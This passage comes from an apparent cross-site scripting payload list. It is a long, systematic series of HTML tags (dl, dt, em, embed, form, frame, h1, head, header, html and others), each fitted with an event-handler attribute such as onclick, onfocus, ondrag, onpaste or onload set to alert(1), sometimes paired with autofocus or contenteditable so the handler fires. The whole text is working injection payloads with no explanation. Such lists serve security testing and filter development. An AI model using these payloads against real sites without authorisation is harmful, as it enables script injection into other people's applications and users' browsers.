id=x></dl><input autofocus> <dl onclick="alert(1)">test</dl> <dl oncontextmenu="alert(1)">test</dl> <dl oncopy="alert(1)" contenteditable>test</dl> <dl oncut="alert(1)" contenteditable>test</dl> <dl ondblclick="alert(1)">test</dl> <dl onfocusout=alert(1) tabindex=1 id=x></dl><input autofocus> <dl onkeydown="alert(1)" contenteditable>test</dl> <dl onkeypress="alert(1)" contenteditable>test</dl> <dl onkeyup="alert(1)" contenteditable>test</dl> <dl onmousedown="alert(1)">test</dl> <dl onmouseenter="alert(1)">test</dl> <dl onmouseleave="alert(1)">test</dl> <dl onmousemove="alert(1)">test</dl> <dl onmouseout="alert(1)">test</dl> <dl onmouseover="alert(1)">test</dl> <dl onmouseup="alert(1)">test</dl> <dl onpaste="alert(1)" contenteditable>test</dl> <dt draggable="true" ondrag="alert(1)">test</dt> <dt draggable="true" ondragend="alert(1)">test</dt> <dt draggable="true" ondragenter="alert(1)">test</dt> <dt draggable="true" ondragleave="alert(1)">test</dt> <dt draggable="true" ondragstart="alert(1)">test</dt> <dt id=x tabindex=1 onactivate=alert(1)></dt> <dt id=x tabindex=1 onbeforeactivate=alert(1)></dt> <dt id=x tabindex=1 onbeforedeactivate=alert(1)></dt><input autofocus> <dt id=x tabindex=1 ondeactivate=alert(1)></dt><input id=y autofocus> <dt id=x tabindex=1 onfocus=alert(1)></dt> <dt id=x tabindex=1 onfocusin=alert(1)></dt> <dt onbeforecopy="alert(1)" contenteditable>test</dt> <dt onbeforecut="alert(1)" contenteditable>test</dt> <dt onbeforepaste="alert(1)" contenteditable>test</dt> <dt onblur=alert(1) tabindex=1 id=x></dt><input autofocus> <dt onclick="alert(1)">test</dt> <dt oncontextmenu="alert(1)">test</dt> <dt oncopy="alert(1)" contenteditable>test</dt> <dt oncut="alert(1)" contenteditable>test</dt> <dt ondblclick="alert(1)">test</dt> <dt onfocusout=alert(1) tabindex=1 id=x></dt><input autofocus> <dt onkeydown="alert(1)" contenteditable>test</dt> <dt onkeypress="alert(1)" contenteditable>test</dt> <dt onkeyup="alert(1)" contenteditable>test</dt> <dt onmousedown="alert(1)">test</dt> <dt onmouseenter="alert(1)">test</dt> <dt onmouseleave="alert(1)">test</dt> <dt onmousemove="alert(1)">test</dt> <dt onmouseout="alert(1)">test</dt> <dt onmouseover="alert(1)">test</dt> <dt onmouseup="alert(1)">test</dt> <dt onpaste="alert(1)" contenteditable>test</dt> <element draggable="true" ondrag="alert(1)">test</element> <element draggable="true" ondragend="alert(1)">test</element> <element draggable="true" ondragenter="alert(1)">test</element> <element draggable="true" ondragleave="alert(1)">test</element> <element draggable="true" ondragstart="alert(1)">test</element> <element id=x tabindex=1 onactivate=alert(1)></element> <element id=x tabindex=1 onbeforeactivate=alert(1)></element> <element id=x tabindex=1 onbeforedeactivate=alert(1)></element><input autofocus> <element id=x tabindex=1 ondeactivate=alert(1)></element><input id=y autofocus> <element id=x tabindex=1 onfocus=alert(1)></element> <element id=x tabindex=1 onfocusin=alert(1)></element> <element onbeforecopy="alert(1)" contenteditable>test</element> <element onbeforecut="alert(1)" contenteditable>test</element> <element onbeforepaste="alert(1)" contenteditable>test</element> <element onblur=alert(1) tabindex=1 id=x></element><input autofocus> <element onclick="alert(1)">test</element> <element oncontextmenu="alert(1)">test</element> <element oncopy="alert(1)" contenteditable>test</element> <element oncut="alert(1)" contenteditable>test</element> <element ondblclick="alert(1)">test</element> <element onfocusout=alert(1) tabindex=1 id=x></element><input autofocus> <element onkeydown="alert(1)" contenteditable>test</element> <element onkeypress="alert(1)" contenteditable>test</element> <element onkeyup="alert(1)" contenteditable>test</element> <element onmousedown="alert(1)">test</element> <element onmouseenter="alert(1)">test</element> <element onmouseleave="alert(1)">test</element> <element onmousemove="alert(1)">test</element> <element onmouseout="alert(1)">test</element> <element onmouseover="alert(1)">test</element> <element onmouseup="alert(1)">test</element> <element onpaste="alert(1)" contenteditable>test</element> <em draggable="true" ondrag="alert(1)">test</em> <em draggable="true" ondragend="alert(1)">test</em> <em draggable="true" ondragenter="alert(1)">test</em> <em draggable="true" ondragleave="alert(1)">test</em> <em draggable="true" ondragstart="alert(1)">test</em> <em id=x tabindex=1 onactivate=alert(1)></em> <em id=x tabindex=1 onbeforeactivate=alert(1)></em> <em id=x tabindex=1 onbeforedeactivate=alert(1)></em><input autofocus> <em id=x tabindex=1 ondeactivate=alert(1)></em><input id=y autofocus> <em id=x tabindex=1 onfocus=alert(1)></em> <em id=x tabindex=1 onfocusin=alert(1)></em> <em onbeforecopy="alert(1)" contenteditable>test</em> <em onbeforecut="alert(1)" contenteditable>test</em> <em onbeforepaste="alert(1)" contenteditable>test</em> <em onblur=alert(1) tabindex=1 id=x></em><input autofocus> <em onclick="alert(1)">test</em> <em oncontextmenu="alert(1)">test</em> <em oncopy="alert(1)" contenteditable>test</em> <em oncut="alert(1)" contenteditable>test</em> <em ondblclick="alert(1)">test</em> <em onfocusout=alert(1) tabindex=1 id=x></em><input autofocus> <em onkeydown="alert(1)" contenteditable>test</em> <em onkeypress="alert(1)" contenteditable>test</em> <em onkeyup="alert(1)" contenteditable>test</em> <em onmousedown="alert(1)">test</em> <em onmouseenter="alert(1)">test</em> <em onmouseleave="alert(1)">test</em> <em onmousemove="alert(1)">test</em> <em onmouseout="alert(1)">test</em> <em onmouseover="alert(1)">test</em> <em onmouseup="alert(1)">test</em> <em onpaste="alert(1)" contenteditable>test</em> <embed draggable="true" ondrag="alert(1)">test</embed> <embed draggable="true" ondragend="alert(1)">test</embed> <embed draggable="true" ondragenter="alert(1)">test</embed> <embed draggable="true" ondragleave="alert(1)">test</embed> <embed draggable="true" ondragstart="alert(1)">test</embed> <embed id=x onfocus=alert(1) type=text/html> <embed id=x onfocusin=alert(1) type=text/html> <embed id=x tabindex=1 onactivate=alert(1)></embed> <embed id=x tabindex=1 onbeforeactivate=alert(1)></embed> <embed id=x tabindex=1 onbeforedeactivate=alert(1)></embed><input autofocus> <embed id=x tabindex=1 ondeactivate=alert(1)></embed><input id=y autofocus> <embed onbeforecopy="alert(1)" contenteditable>test</embed> <embed onbeforecut="alert(1)" contenteditable>test</embed> <embed onbeforepaste="alert(1)" contenteditable>test</embed> <embed onblur=alert(1) tabindex=1 id=x></embed><input autofocus> <embed onclick="alert(1)">test</embed> <embed oncontextmenu="alert(1)">test</embed> <embed oncopy="alert(1)" contenteditable>test</embed> <embed oncut="alert(1)" contenteditable>test</embed> <embed ondblclick="alert(1)">test</embed> <embed onfocusout=alert(1) tabindex=1 id=x></embed><input autofocus> <embed onkeydown="alert(1)" contenteditable>test</embed> <embed onkeypress="alert(1)" contenteditable>test</embed> <embed onkeyup="alert(1)" contenteditable>test</embed> <embed onmousedown="alert(1)">test</embed> <embed onmouseenter="alert(1)">test</embed> <embed onmouseleave="alert(1)">test</embed> <embed onmousemove="alert(1)">test</embed> <embed onmouseout="alert(1)">test</embed> <embed onmouseover="alert(1)">test</embed> <embed onmouseup="alert(1)">test</embed> <embed onpaste="alert(1)" contenteditable>test</embed> <embed src=/ onload=alert(1)> <embed src=1 onerror=alert(1) type=image/gif> <fieldset draggable="true" ondrag="alert(1)">test</fieldset> <fieldset draggable="true" ondragend="alert(1)">test</fieldset> <fieldset draggable="true" ondragenter="alert(1)">test</fieldset> <fieldset draggable="true" ondragleave="alert(1)">test</fieldset> <fieldset draggable="true" ondragstart="alert(1)">test</fieldset> <fieldset id=x tabindex=1 onactivate=alert(1)></fieldset> <fieldset id=x tabindex=1 onbeforeactivate=alert(1)></fieldset> <fieldset id=x tabindex=1 onbeforedeactivate=alert(1)></fieldset><input autofocus> <fieldset id=x tabindex=1 ondeactivate=alert(1)></fieldset><input id=y autofocus> <fieldset id=x tabindex=1 onfocus=alert(1)></fieldset> <fieldset id=x tabindex=1 onfocusin=alert(1)></fieldset> <fieldset onbeforecopy="alert(1)" contenteditable>test</fieldset> <fieldset onbeforecut="alert(1)" contenteditable>test</fieldset> <fieldset onbeforepaste="alert(1)" contenteditable>test</fieldset> <fieldset onblur=alert(1) tabindex=1 id=x></fieldset><input autofocus> <fieldset onclick="alert(1)">test</fieldset> <fieldset oncontextmenu="alert(1)">test</fieldset> <fieldset oncopy="alert(1)" contenteditable>test</fieldset> <fieldset oncut="alert(1)" contenteditable>test</fieldset> <fieldset ondblclick="alert(1)">test</fieldset> <fieldset onfocusout=alert(1) tabindex=1 id=x></fieldset><input autofocus> <fieldset onkeydown="alert(1)" contenteditable>test</fieldset> <fieldset onkeypress="alert(1)" contenteditable>test</fieldset> <fieldset onkeyup="alert(1)" contenteditable>test</fieldset> <fieldset onmousedown="alert(1)">test</fieldset> <fieldset onmouseenter="alert(1)">test</fieldset> <fieldset onmouseleave="alert(1)">test</fieldset> <fieldset onmousemove="alert(1)">test</fieldset> <fieldset onmouseout="alert(1)">test</fieldset> <fieldset onmouseover="alert(1)">test</fieldset> <fieldset onmouseup="alert(1)">test</fieldset> <fieldset onpaste="alert(1)" contenteditable>test</fieldset> <figcaption draggable="true" ondrag="alert(1)">test</figcaption> <figcaption draggable="true" ondragend="alert(1)">test</figcaption> <figcaption draggable="true" ondragenter="alert(1)">test</figcaption> <figcaption draggable="true" ondragleave="alert(1)">test</figcaption> <figcaption draggable="true" ondragstart="alert(1)">test</figcaption> <figcaption id=x tabindex=1 onactivate=alert(1)></figcaption> <figcaption id=x tabindex=1 onbeforeactivate=alert(1)></figcaption> <figcaption id=x tabindex=1 onbeforedeactivate=alert(1)></figcaption><input autofocus> <figcaption id=x tabindex=1 ondeactivate=alert(1)></figcaption><input id=y autofocus> <figcaption id=x tabindex=1 onfocus=alert(1)></figcaption> <figcaption id=x tabindex=1 onfocusin=alert(1)></figcaption> <figcaption onbeforecopy="alert(1)" contenteditable>test</figcaption> <figcaption onbeforecut="alert(1)" contenteditable>test</figcaption> <figcaption onbeforepaste="alert(1)" contenteditable>test</figcaption> <figcaption onblur=alert(1) tabindex=1 id=x></figcaption><input autofocus> <figcaption onclick="alert(1)">test</figcaption> <figcaption oncontextmenu="alert(1)">test</figcaption> <figcaption oncopy="alert(1)" contenteditable>test</figcaption> <figcaption oncut="alert(1)" contenteditable>test</figcaption> <figcaption ondblclick="alert(1)">test</figcaption> <figcaption onfocusout=alert(1) tabindex=1 id=x></figcaption><input autofocus> <figcaption onkeydown="alert(1)" contenteditable>test</figcaption> <figcaption onkeypress="alert(1)" contenteditable>test</figcaption> <figcaption onkeyup="alert(1)" contenteditable>test</figcaption> <figcaption onmousedown="alert(1)">test</figcaption> <figcaption onmouseenter="alert(1)">test</figcaption> <figcaption onmouseleave="alert(1)">test</figcaption> <figcaption onmousemove="alert(1)">test</figcaption> <figcaption onmouseout="alert(1)">test</figcaption> <figcaption onmouseover="alert(1)">test</figcaption> <figcaption onmouseup="alert(1)">test</figcaption> <figcaption onpaste="alert(1)" contenteditable>test</figcaption> <figure draggable="true" ondrag="alert(1)">test</figure> <figure draggable="true" ondragend="alert(1)">test</figure> <figure draggable="true" ondragenter="alert(1)">test</figure> <figure draggable="true" ondragleave="alert(1)">test</figure> <figure draggable="true" ondragstart="alert(1)">test</figure> <figure id=x tabindex=1 onactivate=alert(1)></figure> <figure id=x tabindex=1 onbeforeactivate=alert(1)></figure> <figure id=x tabindex=1 onbeforedeactivate=alert(1)></figure><input autofocus> <figure id=x tabindex=1 ondeactivate=alert(1)></figure><input id=y autofocus> <figure id=x tabindex=1 onfocus=alert(1)></figure> <figure id=x tabindex=1 onfocusin=alert(1)></figure> <figure onbeforecopy="alert(1)" contenteditable>test</figure> <figure onbeforecut="alert(1)" contenteditable>test</figure> <figure onbeforepaste="alert(1)" contenteditable>test</figure> <figure onblur=alert(1) tabindex=1 id=x></figure><input autofocus> <figure onclick="alert(1)">test</figure> <figure oncontextmenu="alert(1)">test</figure> <figure oncopy="alert(1)" contenteditable>test</figure> <figure oncut="alert(1)" contenteditable>test</figure> <figure ondblclick="alert(1)">test</figure> <figure onfocusout=alert(1) tabindex=1 id=x></figure><input autofocus> <figure onkeydown="alert(1)" contenteditable>test</figure> <figure onkeypress="alert(1)" contenteditable>test</figure> <figure onkeyup="alert(1)" contenteditable>test</figure> <figure onmousedown="alert(1)">test</figure> <figure onmouseenter="alert(1)">test</figure> <figure onmouseleave="alert(1)">test</figure> <figure onmousemove="alert(1)">test</figure> <figure onmouseout="alert(1)">test</figure> <figure onmouseover="alert(1)">test</figure> <figure onmouseup="alert(1)">test</figure> <figure onpaste="alert(1)" contenteditable>test</figure> <font draggable="true" ondrag="alert(1)">test</font> <font draggable="true" ondragend="alert(1)">test</font> <font draggable="true" ondragenter="alert(1)">test</font> <font draggable="true" ondragleave="alert(1)">test</font> <font draggable="true" ondragstart="alert(1)">test</font> <font id=x tabindex=1 onactivate=alert(1)></font> <font id=x tabindex=1 onbeforeactivate=alert(1)></font> <font id=x tabindex=1 onbeforedeactivate=alert(1)></font><input autofocus> <font id=x tabindex=1 ondeactivate=alert(1)></font><input id=y autofocus> <font id=x tabindex=1 onfocus=alert(1)></font> <font id=x tabindex=1 onfocusin=alert(1)></font> <font onbeforecopy="alert(1)" contenteditable>test</font> <font onbeforecut="alert(1)" contenteditable>test</font> <font onbeforepaste="alert(1)" contenteditable>test</font> <font onblur=alert(1) tabindex=1 id=x></font><input autofocus> <font onclick="alert(1)">test</font> <font oncontextmenu="alert(1)">test</font> <font oncopy="alert(1)" contenteditable>test</font> <font oncut="alert(1)" contenteditable>test</font> <font ondblclick="alert(1)">test</font> <font onfocusout=alert(1) tabindex=1 id=x></font><input autofocus> <font onkeydown="alert(1)" contenteditable>test</font> <font onkeypress="alert(1)" contenteditable>test</font> <font onkeyup="alert(1)" contenteditable>test</font> <font onmousedown="alert(1)">test</font> <font onmouseenter="alert(1)">test</font> <font onmouseleave="alert(1)">test</font> <font onmousemove="alert(1)">test</font> <font onmouseout="alert(1)">test</font> <font onmouseover="alert(1)">test</font> <font onmouseup="alert(1)">test</font> <font onpaste="alert(1)" contenteditable>test</font> <footer draggable="true" ondrag="alert(1)">test</footer> <footer draggable="true" ondragend="alert(1)">test</footer> <footer draggable="true" ondragenter="alert(1)">test</footer> <footer draggable="true" ondragleave="alert(1)">test</footer> <footer draggable="true" ondragstart="alert(1)">test</footer> <footer id=x tabindex=1 onactivate=alert(1)></footer> <footer id=x tabindex=1 onbeforeactivate=alert(1)></footer> <footer id=x tabindex=1 onbeforedeactivate=alert(1)></footer><input autofocus> <footer id=x tabindex=1 ondeactivate=alert(1)></footer><input id=y autofocus> <footer id=x tabindex=1 onfocus=alert(1)></footer> <footer id=x tabindex=1 onfocusin=alert(1)></footer> <footer onbeforecopy="alert(1)" contenteditable>test</footer> <footer onbeforecut="alert(1)" contenteditable>test</footer> <footer onbeforepaste="alert(1)" contenteditable>test</footer> <footer onblur=alert(1) tabindex=1 id=x></footer><input autofocus> <footer onclick="alert(1)">test</footer> <footer oncontextmenu="alert(1)">test</footer> <footer oncopy="alert(1)" contenteditable>test</footer> <footer oncut="alert(1)" contenteditable>test</footer> <footer ondblclick="alert(1)">test</footer> <footer onfocusout=alert(1) tabindex=1 id=x></footer><input autofocus> <footer onkeydown="alert(1)" contenteditable>test</footer> <footer onkeypress="alert(1)" contenteditable>test</footer> <footer onkeyup="alert(1)" contenteditable>test</footer> <footer onmousedown="alert(1)">test</footer> <footer onmouseenter="alert(1)">test</footer> <footer onmouseleave="alert(1)">test</footer> <footer onmousemove="alert(1)">test</footer> <footer onmouseout="alert(1)">test</footer> <footer onmouseover="alert(1)">test</footer> <footer onmouseup="alert(1)">test</footer> <footer onpaste="alert(1)" contenteditable>test</footer> <form draggable="true" ondrag="alert(1)">test</form> <form draggable="true" ondragend="alert(1)">test</form> <form draggable="true" ondragenter="alert(1)">test</form> <form draggable="true" ondragleave="alert(1)">test</form> <form draggable="true" ondragstart="alert(1)">test</form> <form id=x tabindex=1 onactivate=alert(1)></form> <form id=x tabindex=1 onbeforeactivate=alert(1)></form> <form id=x tabindex=1 onbeforedeactivate=alert(1)></form><input autofocus> <form id=x tabindex=1 ondeactivate=alert(1)></form><input id=y autofocus> <form id=x tabindex=1 onfocus=alert(1)></form> <form id=x tabindex=1 onfocusin=alert(1)></form> <form onbeforecopy="alert(1)" contenteditable>test</form> <form onbeforecut="alert(1)" contenteditable>test</form> <form onbeforepaste="alert(1)" contenteditable>test</form> <form onblur=alert(1) tabindex=1 id=x></form><input autofocus> <form onclick="alert(1)">test</form> <form oncontextmenu="alert(1)">test</form> <form oncopy="alert(1)" contenteditable>test</form> <form oncut="alert(1)" contenteditable>test</form> <form ondblclick="alert(1)">test</form> <form onfocusout=alert(1) tabindex=1 id=x></form><input autofocus> <form onkeydown="alert(1)" contenteditable>test</form> <form onkeypress="alert(1)" contenteditable>test</form> <form onkeyup="alert(1)" contenteditable>test</form> <form onmousedown="alert(1)">test</form> <form onmouseenter="alert(1)">test</form> <form onmouseleave="alert(1)">test</form> <form onmousemove="alert(1)">test</form> <form onmouseout="alert(1)">test</form> <form onmouseover="alert(1)">test</form> <form onmouseup="alert(1)">test</form> <form onpaste="alert(1)" contenteditable>test</form> <form onreset=alert(1)><input type=reset> <form onsubmit=alert(1)><input type=submit> <form><input oninvalid=alert(1) required><input type=submit> <form><input type=search onsearch=alert(1) value="Hit return" autofocus> <form><textarea oninvalid=alert(1) required><input type=submit> <frame draggable="true" ondrag="alert(1)">test</frame> <frame draggable="true" ondragend="alert(1)">test</frame> <frame draggable="true" ondragenter="alert(1)">test</frame> <frame draggable="true" ondragleave="alert(1)">test</frame> <frame draggable="true" ondragstart="alert(1)">test</frame> <frame id=x tabindex=1 onactivate=alert(1)></frame> <frame id=x tabindex=1 onbeforeactivate=alert(1)></frame> <frame id=x tabindex=1 onbeforedeactivate=alert(1)></frame><input autofocus> <frame id=x tabindex=1 ondeactivate=alert(1)></frame><input id=y autofocus> <frame onbeforecopy="alert(1)" contenteditable>test</frame> <frame onbeforecut="alert(1)" contenteditable>test</frame> <frame onbeforepaste="alert(1)" contenteditable>test</frame> <frame onblur=alert(1) tabindex=1 id=x></frame><input autofocus> <frame onclick="alert(1)">test</frame> <frame oncontextmenu="alert(1)">test</frame> <frame oncopy="alert(1)" contenteditable>test</frame> <frame oncut="alert(1)" contenteditable>test</frame> <frame ondblclick="alert(1)">test</frame> <frame onfocusout=alert(1) tabindex=1 id=x></frame><input autofocus> <frame onkeydown="alert(1)" contenteditable>test</frame> <frame onkeypress="alert(1)" contenteditable>test</frame> <frame onkeyup="alert(1)" contenteditable>test</frame> <frame onmousedown="alert(1)">test</frame> <frame onmouseenter="alert(1)">test</frame> <frame onmouseleave="alert(1)">test</frame> <frame onmousemove="alert(1)">test</frame> <frame onmouseout="alert(1)">test</frame> <frame onmouseover="alert(1)">test</frame> <frame onmouseup="alert(1)">test</frame> <frame onpaste="alert(1)" contenteditable>test</frame> <frameset draggable="true" ondrag="alert(1)">test</frameset> <frameset draggable="true" ondragend="alert(1)">test</frameset> <frameset draggable="true" ondragenter="alert(1)">test</frameset> <frameset draggable="true" ondragleave="alert(1)">test</frameset> <frameset draggable="true" ondragstart="alert(1)">test</frameset> <frameset id=x tabindex=1 onactivate=alert(1)></frameset> <frameset id=x tabindex=1 onbeforeactivate=alert(1)></frameset> <frameset id=x tabindex=1 onbeforedeactivate=alert(1)></frameset><input autofocus> <frameset id=x tabindex=1 ondeactivate=alert(1)></frameset><input id=y autofocus> <frameset id=x tabindex=1 onfocus=alert(1)></frameset> <frameset id=x tabindex=1 onfocusin=alert(1)></frameset> <frameset onbeforecopy="alert(1)" contenteditable>test</frameset> <frameset onbeforecut="alert(1)" contenteditable>test</frameset> <frameset onbeforepaste="alert(1)" contenteditable>test</frameset> <frameset onblur=alert(1) tabindex=1 id=x></frameset><input autofocus> <frameset onclick="alert(1)">test</frameset> <frameset oncontextmenu="alert(1)">test</frameset> <frameset oncopy="alert(1)" contenteditable>test</frameset> <frameset oncut="alert(1)" contenteditable>test</frameset> <frameset ondblclick="alert(1)">test</frameset> <frameset onfocusout=alert(1) tabindex=1 id=x></frameset><input autofocus> <frameset onkeydown="alert(1)" contenteditable>test</frameset> <frameset onkeypress="alert(1)" contenteditable>test</frameset> <frameset onkeyup="alert(1)" contenteditable>test</frameset> <frameset onmousedown="alert(1)">test</frameset> <frameset onmouseenter="alert(1)">test</frameset> <frameset onmouseleave="alert(1)">test</frameset> <frameset onmousemove="alert(1)">test</frameset> <frameset onmouseout="alert(1)">test</frameset> <frameset onmouseover="alert(1)">test</frameset> <frameset onmouseup="alert(1)">test</frameset> <frameset onpageshow=alert(1)> <frameset onpaste="alert(1)" contenteditable>test</frameset> <frameset><frame id=x onfocus=alert(1)> <frameset><frame id=x onfocusin=alert(1)> <frameset><frame onload=alert(1)> <h1 draggable="true" ondrag="alert(1)">test</h1> <h1 draggable="true" ondragend="alert(1)">test</h1> <h1 draggable="true" ondragenter="alert(1)">test</h1> <h1 draggable="true" ondragleave="alert(1)">test</h1> <h1 draggable="true" ondragstart="alert(1)">test</h1> <h1 id=x tabindex=1 onactivate=alert(1)></h1> <h1 id=x tabindex=1 onbeforeactivate=alert(1)></h1> <h1 id=x tabindex=1 onbeforedeactivate=alert(1)></h1><input autofocus> <h1 id=x tabindex=1 ondeactivate=alert(1)></h1><input id=y autofocus> <h1 id=x tabindex=1 onfocus=alert(1)></h1> <h1 id=x tabindex=1 onfocusin=alert(1)></h1> <h1 onbeforecopy="alert(1)" contenteditable>test</h1> <h1 onbeforecut="alert(1)" contenteditable>test</h1> <h1 onbeforepaste="alert(1)" contenteditable>test</h1> <h1 onblur=alert(1) tabindex=1 id=x></h1><input autofocus> <h1 onclick="alert(1)">test</h1> <h1 oncontextmenu="alert(1)">test</h1> <h1 oncopy="alert(1)" contenteditable>test</h1> <h1 oncut="alert(1)" contenteditable>test</h1> <h1 ondblclick="alert(1)">test</h1> <h1 onfocusout=alert(1) tabindex=1 id=x></h1><input autofocus> <h1 onkeydown="alert(1)" contenteditable>test</h1> <h1 onkeypress="alert(1)" contenteditable>test</h1> <h1 onkeyup="alert(1)" contenteditable>test</h1> <h1 onmousedown="alert(1)">test</h1> <h1 onmouseenter="alert(1)">test</h1> <h1 onmouseleave="alert(1)">test</h1> <h1 onmousemove="alert(1)">test</h1> <h1 onmouseout="alert(1)">test</h1> <h1 onmouseover="alert(1)">test</h1> <h1 onmouseup="alert(1)">test</h1> <h1 onpaste="alert(1)" contenteditable>test</h1> <head draggable="true" ondrag="alert(1)">test</head> <head draggable="true" ondragend="alert(1)">test</head> <head draggable="true" ondragenter="alert(1)">test</head> <head draggable="true" ondragleave="alert(1)">test</head> <head draggable="true" ondragstart="alert(1)">test</head> <head id=x tabindex=1 onactivate=alert(1)></head> <head id=x tabindex=1 onbeforeactivate=alert(1)></head> <head id=x tabindex=1 onbeforedeactivate=alert(1)></head><input autofocus> <head id=x tabindex=1 ondeactivate=alert(1)></head><input id=y autofocus> <head id=x tabindex=1 onfocus=alert(1)></head> <head id=x tabindex=1 onfocusin=alert(1)></head> <head onbeforecopy="alert(1)" contenteditable>test</head> <head onbeforecut="alert(1)" contenteditable>test</head> <head onbeforepaste="alert(1)" contenteditable>test</head> <head onblur=alert(1) tabindex=1 id=x></head><input autofocus> <head onclick="alert(1)">test</head> <head oncontextmenu="alert(1)">test</head> <head oncopy="alert(1)" contenteditable>test</head> <head oncut="alert(1)" contenteditable>test</head> <head ondblclick="alert(1)">test</head> <head onfocusout=alert(1) tabindex=1 id=x></head><input autofocus> <head onkeydown="alert(1)" contenteditable>test</head> <head onkeypress="alert(1)" contenteditable>test</head> <head onkeyup="alert(1)" contenteditable>test</head> <head onmousedown="alert(1)">test</head> <head onmouseenter="alert(1)">test</head> <head onmouseleave="alert(1)">test</head> <head onmousemove="alert(1)">test</head> <head onmouseout="alert(1)">test</head> <head onmouseover="alert(1)">test</head> <head onmouseup="alert(1)">test</head> <head onpaste="alert(1)" contenteditable>test</head> <header draggable="true" ondrag="alert(1)">test</header> <header draggable="true" ondragend="alert(1)">test</header> <header draggable="true" ondragenter="alert(1)">test</header> <header draggable="true" ondragleave="alert(1)">test</header> <header draggable="true" ondragstart="alert(1)">test</header> <header id=x tabindex=1 onactivate=alert(1)></header> <header id=x tabindex=1 onbeforeactivate=alert(1)></header> <header id=x tabindex=1 onbeforedeactivate=alert(1)></header><input autofocus> <header id=x tabindex=1 ondeactivate=alert(1)></header><input id=y autofocus> <header id=x tabindex=1 onfocus=alert(1)></header> <header id=x tabindex=1 onfocusin=alert(1)></header> <header onbeforecopy="alert(1)" contenteditable>test</header> <header onbeforecut="alert(1)" contenteditable>test</header> <header onbeforepaste="alert(1)" contenteditable>test</header> <header onblur=alert(1) tabindex=1 id=x></header><input autofocus> <header onclick="alert(1)">test</header> <header oncontextmenu="alert(1)">test</header> <header oncopy="alert(1)" contenteditable>test</header> <header oncut="alert(1)" contenteditable>test</header> <header ondblclick="alert(1)">test</header> <header onfocusout=alert(1) tabindex=1 id=x></header><input autofocus> <header onkeydown="alert(1)" contenteditable>test</header> <header onkeypress="alert(1)" contenteditable>test</header> <header onkeyup="alert(1)" contenteditable>test</header> <header onmousedown="alert(1)">test</header> <header onmouseenter="alert(1)">test</header> <header onmouseleave="alert(1)">test</header> <header onmousemove="alert(1)">test</header> <header onmouseout="alert(1)">test</header> <header onmouseover="alert(1)">test</header> <header onmouseup="alert(1)">test</header> <header onpaste="alert(1)" contenteditable>test</header> <hgroup draggable="true" ondrag="alert(1)">test</hgroup> <hgroup draggable="true" ondragend="alert(1)">test</hgroup> <hgroup draggable="true" ondragenter="alert(1)">test</hgroup> <hgroup draggable="true" ondragleave="alert(1)">test</hgroup> <hgroup draggable="true" ondragstart="alert(1)">test</hgroup> <hgroup id=x tabindex=1 onactivate=alert(1)></hgroup> <hgroup id=x tabindex=1 onbeforeactivate=alert(1)></hgroup> <hgroup id=x tabindex=1 onbeforedeactivate=alert(1)></hgroup><input autofocus> <hgroup id=x tabindex=1 ondeactivate=alert(1)></hgroup><input id=y autofocus> <hgroup id=x tabindex=1 onfocus=alert(1)></hgroup> <hgroup id=x tabindex=1 onfocusin=alert(1)></hgroup> <hgroup onbeforecopy="alert(1)" contenteditable>test</hgroup> <hgroup onbeforecut="alert(1)" contenteditable>test</hgroup> <hgroup onbeforepaste="alert(1)" contenteditable>test</hgroup> <hgroup onblur=alert(1) tabindex=1 id=x></hgroup><input autofocus> <hgroup onclick="alert(1)">test</hgroup> <hgroup oncontextmenu="alert(1)">test</hgroup> <hgroup oncopy="alert(1)" contenteditable>test</hgroup> <hgroup oncut="alert(1)" contenteditable>test</hgroup> <hgroup ondblclick="alert(1)">test</hgroup> <hgroup onfocusout=alert(1) tabindex=1 id=x></hgroup><input autofocus> <hgroup onkeydown="alert(1)" contenteditable>test</hgroup> <hgroup onkeypress="alert(1)" contenteditable>test</hgroup> <hgroup onkeyup="alert(1)" contenteditable>test</hgroup> <hgroup onmousedown="alert(1)">test</hgroup> <hgroup onmouseenter="alert(1)">test</hgroup> <hgroup onmouseleave="alert(1)">test</hgroup> <hgroup onmousemove="alert(1)">test</hgroup> <hgroup onmouseout="alert(1)">test</hgroup> <hgroup onmouseover="alert(1)">test</hgroup> <hgroup onmouseup="alert(1)">test</hgroup> <hgroup onpaste="alert(1)" contenteditable>test</hgroup> <hr draggable="true" ondrag="alert(1)">test</hr> <hr draggable="true" ondragend="alert(1)">test</hr> <hr draggable="true" ondragenter="alert(1)">test</hr> <hr draggable="true" ondragleave="alert(1)">test</hr> <hr draggable="true" ondragstart="alert(1)">test</hr> <hr id=x tabindex=1 onactivate=alert(1)></hr> <hr id=x tabindex=1 onbeforeactivate=alert(1)></hr> <hr id=x tabindex=1 onbeforedeactivate=alert(1)></hr><input autofocus> <hr id=x tabindex=1 ondeactivate=alert(1)></hr><input id=y autofocus> <hr id=x tabindex=1 onfocus=alert(1)></hr> <hr id=x tabindex=1 onfocusin=alert(1)></hr> <hr onbeforecopy="alert(1)" contenteditable>test</hr> <hr onbeforecut="alert(1)" contenteditable>test</hr> <hr onbeforepaste="alert(1)" contenteditable>test</hr> <hr onblur=alert(1) tabindex=1 id=x></hr><input autofocus> <hr onclick="alert(1)">test</hr> <hr oncontextmenu="alert(1)">test</hr> <hr oncopy="alert(1)" contenteditable>test</hr> <hr oncut="alert(1)" contenteditable>test</hr> <hr ondblclick="alert(1)">test</hr> <hr onfocusout=alert(1) tabindex=1 id=x></hr><input autofocus> <hr onkeydown="alert(1)" contenteditable>test</hr> <hr onkeypress="alert(1)" contenteditable>test</hr> <hr onkeyup="alert(1)" contenteditable>test</hr> <hr onmousedown="alert(1)">test</hr> <hr onmouseenter="alert(1)">test</hr> <hr onmouseleave="alert(1)">test</hr> <hr onmousemove="alert(1)">test</hr> <hr onmouseout="alert(1)">test</hr> <hr onmouseover="alert(1)">test</hr> <hr onmouseup="alert(1)">test</hr> <hr onpaste="alert(1)" contenteditable>test</hr> <html draggable="true" ondrag="alert(1)">test</html> <html draggable="true" ondragend="alert(1)">test</html> <html draggable="true" ondragenter="alert(1)">test</html> <html draggable="true" ondragleave="alert(1)">test</html> <html draggable="true" ondragstart="alert(1)">test</html> <html id=x tabindex=1 onactivate=alert(1)></html> <html id=x tabindex=1 onbeforeactivate=alert(1)></html> <html id=x tabindex=1 onbeforedeactivate=alert(1)></html><input autofocus> <html id=x tabindex=1 ondeactivate=alert(1)></html><input id=y autofocus> <html id=x tabindex=1 onfocus=alert(1)></html> <html id=x tabindex=1 onfocusin=alert(1)></html> <html onbeforecopy="alert(1)" contenteditable>test</html> <html onbeforecut="alert(1)" contenteditable>test</html> <html onbeforepaste="alert(1)" contenteditable>test</html> <html onblur=alert(1) tabindex=1 id=x></html><input 